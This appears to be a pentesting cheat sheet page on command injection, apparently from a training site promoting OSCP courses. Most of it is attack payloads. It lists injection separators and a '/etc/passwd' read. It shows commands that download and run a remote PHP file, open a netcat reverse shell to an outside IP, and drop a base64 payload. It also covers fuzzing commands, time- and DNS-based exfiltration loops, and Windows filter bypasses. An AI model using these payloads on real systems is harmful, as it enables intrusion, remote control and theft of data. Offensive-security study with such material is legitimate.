# Command Injection {% tabs %} {% tab title="Support VeryLazyTech ๐ŸŽ‰" %} * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! ๐ŸŽ** * **Follow** us on: * **โœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **๐Ÿ‘พ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **๐Ÿ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **๐Ÿ“บ YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **๐Ÿ“ฉ Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **๐Ÿ•ต๏ธโ€โ™‚๏ธ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. ๐Ÿ“š {% endtab %} {% endtabs %} ## Basic info **Command Injection** is a critical vulnerability that allows an attacker to **execute arbitrary system commands** on a server hosting an application. If an application **improperly handles user input** and passes it to the operating system, an attacker can **escape the intended function** and execute system commands with the **same privileges** as the application. Depending on **where your input is being injected** you may need to **terminate the quoted context** (using `"` or `'`) before the commands. {% hint style="success" %} ### **๐Ÿ› ๏ธ How Command Injection Works** Applications that interact with the OS (e.g., calling system functions) without properly validating user input can be exploited. #### **Example: Vulnerable Code (PHP)** ```php ``` ๐Ÿ’ก **Problem:** The script takes the `user` parameter and directly appends it to the `ping` command **without validation**.\ ๐Ÿ’ฃ **Attack:** Inject `; cat /etc/passwd` to execute an extra command! ```bash http://target.com/ping.php?user=127.0.0.1;cat /etc/passwd ``` {% endhint %} ### Command Injection/Execution ```bash #Both Unix and Windows supported ls||id; ls ||id; ls|| id; ls || id # Execute both ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe) ls&&id; ls &&id; ls&& id; ls && id # Execute 2ยบ if 1ยบ finish ok ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2ยบ ls %0A id # %0A Execute both (RECOMMENDED) #Only unix supported `ls` # `` $(ls) # $() ls; id # ; Chain commands ls${LS_COLORS:10:1}${IFS}id # Might be useful #Not executed but may be interesting > /var/www/html/out.txt #Try to redirect the output to a file < /etc/passwd #Try to send some input to the command ``` #### **Limition** Bypasses If you are trying to execute **arbitrary commands inside a linux machine** you will be interested to read about this **Bypasses:** {% embed url="" %} #### **Examples** ``` vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80 vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay ``` #### Parameters Here are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities: ``` ?cmd={payload} ?exec={payload} ?command={payload} ?execute{payload} ?ping={payload} ?query={payload} ?jump={payload} ?code={payload} ?reg={payload} ?do={payload} ?func={payload} ?arg={payload} ?option={payload} ?load={payload} ?process={payload} ?step={payload} ?read={payload} ?function={payload} ?req={payload} ?feature={payload} ?exe={payload} ?module={payload} ?payload={payload} ?run={payload} ?print={payload} ``` #### **wfuzz** ```bash wfuzz -c -z file,payloads.txt --hc 404 "http://target.com/page?input=FUZZ" ``` #### **ffuf** ```bash ffuf -u "http://target.com/page?input=FUZZ" -w payloads.txt ``` #### Time based data exfiltration Extracting data: char by char ``` swissky@crashlabโ–ธ ~ โ–ธ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi real 0m5.007s user 0m0.000s sys 0m0.000s swissky@crashlabโ–ธ ~ โ–ธ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi real 0m0.002s user 0m0.000s sys 0m0.000s ``` #### DNS based data exfiltration Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbin.zhack.ca ``` 1. Go to http://dnsbin.zhack.ca/ 2. Execute a simple 'ls' for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done ``` ``` $(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il) ``` Online tools to check for DNS based data exfiltration: * dnsbin.zhack.ca * pingb.in ### Filtering bypass #### **Windows** ``` powershell C:**2\n??e*d.*? # notepad @^p^o^w^e^r^shell c:**32\c*?c.e?e # calc ``` #### **Linux** {% embed url="" %} *** {% hint style="success" %} Learn & practice [**For the OSCP.**](https://shop.verylazytech.com)
Support VeryLazyTech ๐ŸŽ‰ * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! ๐ŸŽ** * **Follow** us on: * **โœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **๐Ÿ‘พ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **๐Ÿ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **๐Ÿ“บ YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **๐Ÿ“ฉ Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **๐Ÿ•ต๏ธโ€โ™‚๏ธ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. ๐Ÿ“š
{% endhint %}